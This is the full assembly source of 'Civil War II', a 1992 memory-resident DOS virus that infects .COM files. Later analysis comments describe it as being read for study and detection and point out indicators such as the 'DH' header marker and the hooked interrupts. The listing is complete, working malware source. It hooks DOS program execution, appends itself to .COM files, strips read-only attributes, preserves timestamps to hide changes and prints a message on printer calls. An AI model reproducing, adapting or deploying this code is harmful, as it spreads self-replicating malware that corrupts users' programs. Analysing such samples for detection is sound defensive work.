Assembly Source File  |  1992-06-04  |  9KB  |  363 lines

  1. ;****************************************************************************
  2. ;   Civil War II                                                      *
  3. ;                                                                *
  4. ;   Assembled with Tasm 2.5                                            *
  5. ;   (c) 1992 Dark Helmet, The Netherlands                               *
  6. ;   The author takes no responsibility for any damage caused by this virus  *
  7. ;                                        *
  8. ;****************************************************************************
  9. ;                                        *
  10. ;   Civil War...                                *
  11. ;                                        *
  12. ;   "For all I've seen has change my mind                               *
  13. ;    But still the wars go on as the years go by                        *
  14. ;    With no love for God or human rights                               *
  15. ;    'Cause all these dreams are swept aside                            *
  16. ;    By bloody hands of the hypnotized                        *
  17. ;    Who carry the cross of homicide                                    *
  18. ;    And history bears the scars of our civil war"                      *
  19. ;                                                                *
  20. ;****************************************************************************
  21.  
  ; Analysis note: this listing is a DOS .COM file infector, read here for study and detection.
  ; ".Radix 16" makes every unsuffixed number in the file hexadecimal
  ; (so "50" further down is 50h, "40" is 40h, "100" is 100h).
  22.               .Radix 16
  23. Civil_War     Segment
  24.         Model  small
  25.               Assume cs:Civil_War, ds:Civil_War, es:Civil_War
  26.  
  27.               org 100h
  28.  
  ; len = number of bytes from "begin" to "last"; it is the byte count used by both
  ; copy operations in this file (install_virus and write_virus).
  29. len           equ offset last - begin
  ; virus_len is not referenced anywhere else in this listing.
  30. virus_len     equ len / 16d 
  31.  
  ; Six-byte stand-in for an infected file's header: E9 03 00 is a near jump over the
  ; next three bytes to "begin"; 44h 48h are the two bytes check_infect compares at
  ; offsets 3-4 of a file it has opened.
  32. dummy:             db 0e9h, 03h, 00h, 44h, 48h, 00h       ; Jump + infection
  33.                                               ; marker
  34.  
  ; Entry stub. The call/pop pair reads the runtime IP; subtracting 109h (the address
  ; after the call in this build: org 100h + 6-byte dummy + 3-byte call) leaves in BP the
  ; displacement between where the code is running and where it was assembled.
  ; Every later "+bp" operand in the loader relies on that value.
  35. begin:             Call virus                            ; make call to
  36.                                                ; push IP on stack
  37.  
  38. virus:             pop      bp                          ; get IP from stack.
  39.               sub      bp,109h                      ; adjust IP.
  40.  
  ; Copies the 6 bytes saved in carrier_begin back to offset 100h, i.e. over the
  ; 6-byte header that check_infect read from the file before it was modified.
  41. restore_host:      mov      di,0100h                    ; recover beginning
  42.               lea      si,ds:[carrier_begin+bp]     ; of carrier program.
  43.               mov      cx,06h
  44.               rep      movsb
  45.  
  ; Residency handshake: INT 21h with AH=A0h. The resident handler (main_virus) answers
  ; AX=0001h, in which case installation is skipped. This call/response pair is a
  ; behavioural indicator of the resident copy.
  46. check_resident:    mov    ah,0a0h                     ; check if virus
  47.              int    21h                         ; already installed.
  48.              cmp    ax,0001h
  49.              je       end_virus
  50.  
  ; Shrinks the program's own memory block. DS is pointed at segment CS-1, which is read
  ; as a DOS Memory Control Block (assumes CS is the PSP segment, as at .COM entry):
  ; byte 0 is compared with 5Ah (last block in the chain) and the word at offset 3 (block
  ; size in paragraphs) is reduced. With .Radix 16 the "50" is 50h paragraphs = 1280 bytes,
  ; not the 1 KB the author's comment states. The reduction in DOS-reported memory is an
  ; observable side effect of installation.
  51. adjust_memory:     mov      ax,cs                          ; start of Memory
  52.               dec      ax                          ; Control Block
  53.               mov      ds,ax
  54.               cmp      byte ptr ds:[0000],5a          ; check if last
  55.                                                ; block
  56.               jne      abort                          ; if not last block
  57.                                                ; end
  58.               mov      ax,ds:[0003]                   ; decrease memory
  59.               sub      ax,50                       ; by 1kbyte lenght
  60.               mov      ds:0003,ax
  61.  
  ; Copies len bytes starting at "begin" to offset 100h of segment ES + (new block size),
  ; i.e. the paragraph just past the shrunken block (presumably ES still holds the PSP
  ; segment here - confirm against DOS entry state). Because "begin" is assembled at 106h
  ; but lands at 100h, every reference made by the resident copy is written as "label-6".
  62. install_virus:     mov      bx,ax                          ; es point to start
  63.               mov      ax,es                          ; virus in memory
  64.               add      ax,bx
  65.               mov      es,ax
  66.               mov      cx,len                     ; cx = lenght virus
  67.               mov      ax,ds                          ; restore ds
  68.               inc      ax
  69.               mov      ds,ax
  70.               lea      si,ds:[begin+bp]               ; point to start virus
  71.               lea      di,es:0100                     ; point to destination
  72.               rep      movsb                          ; copy virus in
  73.                                                ; memory
  ; The destination segment is remembered in virus_segment for hook_vector.
  74.               mov      [virus_segment+bp],es             ; store start virus
  75.                                                ; in memory
  76.               mov     ax,cs                         ; restore es
  77.               mov      es,ax
  78.  
  ; Interrupt hooking, done through DOS itself: INT 21h AH=35h returns a vector in ES:BX,
  ; AH=25h sets a vector to DS:DX. Two vectors are changed here: INT 17h (BIOS printer
  ; services) and INT 21h (DOS services). Changed INT 17h/21h vectors together with the
  ; shrunken memory block are what a memory inspection of an affected machine would show.
  79. hook_vector:       cli                    ; no interups
  80.         mov    ax,3517h
  81.         int    21h
  ; ES is reloaded with the resident segment before the two stores below, so the word
  ; written to old_17h+2 is that reloaded ES value.
  82.         mov    es,[virus_segment+bp]
  83.         mov    es:[old_17h-6],bx
  84.         mov    es:[old_17h+2-6h],es
  ; New INT 17h vector = DS:(new_17h-6); DS is not changed in this block before the call.
  85.         mov    dx,offset new_17h - 6h
  86.         mov    ax,2517h
  87.         int    21h
  88.         
  89.         mov      ax,3521h            ; revector int 21
  90.               int      21h
  ; DS now addresses the resident copy: the previous INT 21h vector (ES:BX) is saved in
  ; old_21h and the new vector becomes resident_segment:(main_virus-6).
  91.         mov     ds,[virus_segment+bp]
  92.         mov      ds:[old_21h-6h],bx
  93.               mov      ds:[old_21h+2-6h],es
  94.              mov      dx,offset main_virus - 6h
  95.               mov      ax,2521h
  96.               int      21h
  97.               sti
  98.  
  ; Hand-over to the host program: DS and ES are set back to CS and AX is cleared, then
  ; control jumps to offset 100h, where restore_host put the saved header bytes back.
  ; check_resident jumps straight to end_virus, skipping the segment reset.
  99. abort:             mov      ax,cs
  100.              mov      ds,ax
  101.               mov      es,ax
  102.         xor     ax,ax
  103.  
  104. end_virus:         mov    bx,0100h            ; jump to begin
  105.         jmp    bx                ; host file
  106.  
  107.         
  108. ;***************************************************************************
  109.  
  ; Resident INT 21h entry point (installed by hook_vector). A call with AH=A0h is
  ; answered directly with AX=0001h and an IRET - the other half of the check_resident
  ; handshake. Any other function falls through to new_21h.
  110. main_virus:        pushf                    
  111.         cmp    ah,0a0h                ; check virus call
  112.         jne    new_21h                ; no virus call
  113.         mov    ax,0001h            ; ax = id
  114.         popf                    ; return id    
  115.         iret
  116.         
  ; INT 21h dispatcher. Saves the caller's registers, then picks out three requests:
  ;   AH=40h with BX=0004h  (write to handle 4, the DOS printer handle) -> message
  ;   AH=05h                (DOS printer output)                        -> message
  ;   AX=4B00h              (load and execute a program)                -> chk_com
  ; Everything else is passed unchanged to the saved original handler via "continu".
  117. new_21h:    push    ds                ; save registers
  118.         push    es
  119.         push    di
  120.         push    si
  121.         push    ax
  122.         push    bx
  123.         push    cx
  124.         push    dx
  125.  
  126.         cmp    ah,40h
  127.         jne    check_05
  128.         cmp    bx,0004h
  129.         jne    check_05
  130.         jmp    message
  131.  
  132. check_05:    cmp    ah,05h
  133.         jne    check_exec
  134.         jmp    message        
  135.  
  ; On an exec request DS:DX (the program file name) is saved in name_seg/name_off
  ; for the file routines that follow chk_com.
  136. check_exec:    cmp    ax,04b00h            ; exec function?
  137.         jne    continu
  138.         mov    cs:[name_seg-6],ds
  139.         mov    cs:[name_off-6],dx
  140.         jmp    chk_com
  141.  
  ; Common exit: pops in the reverse of the push order above (plus the flags pushed in
  ; main_virus) and chains to the address stored in old_21h, so the caller's request
  ; is still serviced.
  142. continu:    pop    dx                ; restore registers
  143.         pop    cx
  144.         pop    bx
  145.         pop    ax
  146.         pop    si
  147.         pop    di
  148.         pop    es
  149.         pop    ds
  150.         popf
  151.         jmp    dword ptr cs:[old_21h-6]
  152.  
  ; File-name filter for exec requests. Scans the name at DS:DX for '.', then requires
  ; the extension to be "COM" (the word compare against 'M' also requires the byte after
  ; it to be zero, i.e. the end of the name). The comparison is against upper-case
  ; literals only. Names whose two characters before the '.' are "ND" are skipped, which
  ; the author's comment describes as the COMMAND.COM exclusion.
  153. chk_com:    cld                    ; check extension
  154.         mov    di,dx                ; for COM
  155.         push    ds
  156.         pop    es
  157.         mov    al,'.'                ; search extension
  158.         repne    scasb                ; check 'COM"
  159.         cmp    word ptr es:[di],'OC'        ; check 'CO'
  160.         jne    continu
  161.         cmp    word ptr es:[di+2],'M'        ; check 'M'
  162.         jne    continu
  163.         cmp    word ptr es:[di-3],'DN'        ; check if
  164.         je      continu                ; COMMAND.COM
  165.         
  ; For an accepted name: install the temporary INT 24h handler and clear the
  ; read-only attribute, then fall through to open_file.
  166.         call    set_int24h
  167.         call    set_atribuut
  168.                 
  ; File modification sequence for the program named in the exec request. All DOS calls
  ; go through do_int21h, i.e. the saved original handler, not the hooked vector.
  ; Opens the file read/write (AX=3D02h); a failed open goes straight to close_file.
  169. open_file:    mov    ds,cs:[name_seg-6]
  170.         mov    dx,cs:[name_off-6]
  171.         mov    ax,3D02h            ; open file
  172.         call     do_int21h
  173.         jc    close_file
  174.         push    cs
  175.         pop    ds
  176.         mov    [handle-6],ax
  177.         mov    bx,ax    
  178.  
  ; The file's date and time stamp is read now and written back in save_date.
  179.         call    get_date    
  180.         
  ; Reads the first 6 bytes of the file into carrier_begin and compares bytes 3 and 4
  ; with "initials" (44h,48h = 'D','H'). A match means the file already carries the
  ; marker and is left unmodified. For scanning purposes this is the file-level
  ; indicator: a .COM file with 'D','H' at offsets 3-4.
  181. check_infect:    push    cs
  182.         pop    ds
  183.         mov    bx,[handle-6]            ; read first 6 bytes
  184.         mov    ah,3fh
  185.         mov    cx,06h
  186.         lea    dx,[carrier_begin-6]
  187.         call    do_int21h
  188.         mov    al, byte ptr [carrier_begin-6]+3 ; check initials
  189.         mov    ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H'
  190.         cmp    ax,[initials-6]
  191.         je    save_date             ; if equal already
  192.                              ; infect
  193.         
  ; Seeks to the start and then to the end of the file; the end position returned in AX
  ; minus 3 is stored in lenght_file and later written as the 16-bit operand of the
  ; E9 jump placed at the start of the file. Only AX is used.
  194. get_lenght:    mov    ax,4200h            ; file pointer begin
  195.         call    move_pointer
  196.         mov    ax,4202h            ; file pointer end
  197.         call    move_pointer
  198.         sub    ax,03h                ; ax = filelenght
  199.         mov    [lenght_file-6],ax
  200.         
  201.         call    write_jmp
  202.         call    write_virus                    
  203.  
  ; Writes the original date/time back (AX=5701h), so the file's timestamp does not
  ; change. The modification time is therefore not a reliable indicator; the size
  ; increase of len bytes and the header marker are.
  204. save_date:    push    cs
  205.         pop    ds
  206.         mov    bx,[handle-6]
  207.         mov    dx,[date-6]
  208.         mov    cx,[time-6]
  209.         mov    ax,5701h
  210.         call    do_int21h
  211.  
  ; Closes the handle, restores the INT 24h vector saved by set_int24h, and returns to
  ; "continu" so the original exec request is carried out.
  212. close_file:    mov    bx,[handle-6]
  213.         mov    ah,03eh                ; close file
  214.         call    do_int21h
  215.         
  216.         mov    dx,cs:[old_24h-6]        ; restore int24h
  217.         mov    ds,cs:[old_24h+2-6]
  218.         mov    ax,2524h
  219.         call    do_int21h
  220.         
  221.         jmp    continu        
  222.         
  223.         
  224.  
  225.  
  ; Temporary INT 24h (DOS critical error) handler, installed by set_int24h and removed
  ; in close_file. Returning AL=3 tells DOS to fail the call, so no "Abort, Retry, Fail"
  ; prompt appears if a file operation hits an error such as write-protected media.
  226. new_24h:    mov    al,3
  227.         iret
  228.  
  229.  
  ; INT 17h (BIOS printer services) hook. For AH=00h (print a character) it first goes
  ; to print_message; all calls are then chained to the address stored in old_17h.
  230. new_17h:    cli
  231.         pushf
  232.         push    ds
  233.         push    es
  234.         push    di
  235.         push    si
  236.         push    ax
  237.         push    bx
  238.         push    cx
  239.         push    dx
  240.         
  241.         cmp    ah,00h
  242.         jne    continu_17h
  243.         jmp    print_message
  244.  
  ; Restores the registers saved above and chains to the saved INT 17h pointer.
  245. continu_17h:    pop    dx
  246.         pop    cx
  247.         pop    bx
  248.         pop    ax
  249.         pop    si
  250.         pop    di
  251.         pop    es
  252.         pop    ds
  253.         popf
  254.         sti
  255.         jmp    dword ptr cs:[old_17h-6]
  256.  
  ; Calls DOS function 09h (print '$'-terminated string) with DX = text-6, through the
  ; saved original INT 21h handler.
  257. print_message:  mov    ah,09h
  258.         lea    dx,cs:text-6h
  259.         call    do_int21h
  260.         jmp    continu_17h         
  261.  
  262. ;---------------------------------------------------------------------------
  263. ;            PROCEDURES
  264. ;---------------------------------------------------------------------------
  265.  
  ; Payload path for the two printer-related INT 21h requests singled out in new_21h:
  ; calls DOS function 09h (print '$'-terminated string) with DX = text-6, then returns to
  ; "continu", which passes the caller's original request on to DOS.
  266. message:    mov    ah,09h
  267.         lea    dx,cs:text-6h
  268.         call    do_int21h
  269.         jmp    continu
  270.  
  271.  
  272.  
  ; Seek helper. The caller supplies AX (4200h = from start, 4202h = from end); this
  ; routine sets DS=CS, BX = saved handle and CX:DX = 0, so the file pointer ends up at
  ; the very start or the very end. DOS returns the new position in DX:AX.
  273. move_pointer:    push    cs
  274.         pop    ds
  275.         mov    bx,[handle-6]
  276.         xor    cx,cx
  277.         xor    dx,dx
  278.         call    do_int21h
  279.         ret
  280.  
  ; Calls the original INT 21h handler saved in old_21h. PUSHF followed by a far CALL
  ; builds the same stack frame as an INT instruction, so the handler's IRET returns
  ; here. Used for every DOS call the resident code makes, which keeps those calls
  ; from re-entering the code's own INT 21h hook.
  281. do_int21h:    pushf
  282.         call     dword ptr cs:[old_21h-6]
  283.         ret
  284.  
  ; Overwrites the first 5 bytes of the open file with three consecutive writes
  ; (AH=40h): 1 byte from "jump" (E9h), 2 bytes from lenght_file (the jump operand
  ; computed in get_lenght) and 2 bytes from "initials" (44h,48h).
  ; Resulting header layout: E9 <lo> <hi> 44 48 - the pattern check_infect tests for.
  285. write_jmp:    push    cs
  286.         pop    ds
  287.         mov    ax,4200h
  288.         call    move_pointer
  289.         mov    ah,40h
  290.         mov    cx,01h
  291.         lea    dx,[jump-6]
  292.         call    do_int21h
  293.         mov    ah,40h
  294.         mov    cx,02h
  295.         lea    dx,[lenght_file-6]
  296.         call    do_int21h
  297.         mov    ah,40h
  298.         mov    cx,02h
  299.         lea    dx,[initials-6]
  300.         call    do_int21h
  301.         ret
  302.  
  ; Seeks to the end of the open file and writes len bytes starting at DS:100h, with
  ; DS=CS. Under .Radix 16 the operands "40" and "100" are 40h (DOS write) and 100h.
  ; Net effect on the file: it grows by len bytes.
  303. write_virus:    push    cs
  304.         pop    ds
  305.         mov    ax,4202h
  306.         call    move_pointer
  307.         mov    ah,40
  308.         mov    cx,len
  309.         mov    dx,100
  310.         call    do_int21h
  311.         ret
  312.  
  ; Reads the open file's date and time stamp (AX=5700h; the caller has the handle in
  ; BX) and stores DX in "date" and CX in "time" for save_date to write back.
  313. get_date:    mov    ax,5700h
  314.         call    do_int21h
  315.         push    cs
  316.         pop    ds
  317.         mov    [date-6],dx
  318.         mov    [time-6],cx
  319.         ret
  320.  
  ; Saves the current INT 24h (critical error) vector in old_24h and points the vector
  ; at CS:(new_24h-6) for the duration of the file operations; close_file restores it.
  321. set_int24h:    mov    ax,3524h
  322.         call    do_int21h
  323.         mov    cs:[old_24h-6],bx
  324.         mov    cs:[old_24h+2-6],es
  325.         mov    dx,offset new_24h-6
  326.         push    cs
  327.         pop    ds
  328.         mov    ax,2524h
  329.         call    do_int21h
  330.         ret
  331.  
  ; Reads the attributes of the file named in name_seg:name_off (AX=4300h), clears bit 0
  ; of CL (the read-only bit) and writes them back (AX=4301h). Nothing in this listing
  ; sets the bit again afterwards, so a previously read-only .COM file that has lost
  ; the attribute is a further indicator.
  332. set_atribuut:    mov    ax,4300h            ; get atribuut
  333.         mov    ds,cs:[name_seg-6]
  334.         mov    dx,cs:[name_off-6]
  335.         call    do_int21h
  336.         and    cl,0feh                ; set atribuut
  337.         mov    ax,4301h
  338.         call    do_int21h        
  339.         ret
  340.  
  341. ;---------------------------------------------------------------------------
  342. ;                DATA
  343. ;---------------------------------------------------------------------------
  344.  
  ; Saved interrupt vectors (offset word, then segment word) for INT 21h, 17h and 24h.
  345. old_21h            dw  00h,00h
  346. old_17h        dw  00h,00h
  347. old_24h        dw  00h,00h
  ; Buffer for the 6 header bytes of the current file. The initial contents are
  ; 90h (NOP), CDh 20h (INT 20h), then 44h 48h 00h.
  348. carrier_begin      db  090h, 0cdh, 020h, 044h, 048h, 00h
  ; Plain-text string printed by the payload; it is stored unencoded in the resident
  ; code, so it can serve as a search string alongside the header marker.
  349. text          db  'Civil War II v1.0, (c) 06/03/1992 The Netherlands.','$',00h
  ; Opcode byte written at offset 0 of a modified file (E9h = near jump).
  350. jump        db  0e9h
  ; Scratch variables used by the resident file routines.
  351. name_seg    dw  ?
  352. name_off    dw  ?
  353. virus_segment      dw  ?
  354. lenght_file    dw  ?
  355. handle        dw  ?
  356. date        dw  ?
  357. time        dw  ?
  ; 4844h is stored as bytes 44h,48h ('D','H'): the marker written at file offsets 3-4.
  358. initials    dw  4844h
  ; "last" marks the end of the region measured by len (its own byte is not counted).
  359. last          db  090h
  360.  
  361. Civil_war     ends
  362.               end dummy
  363.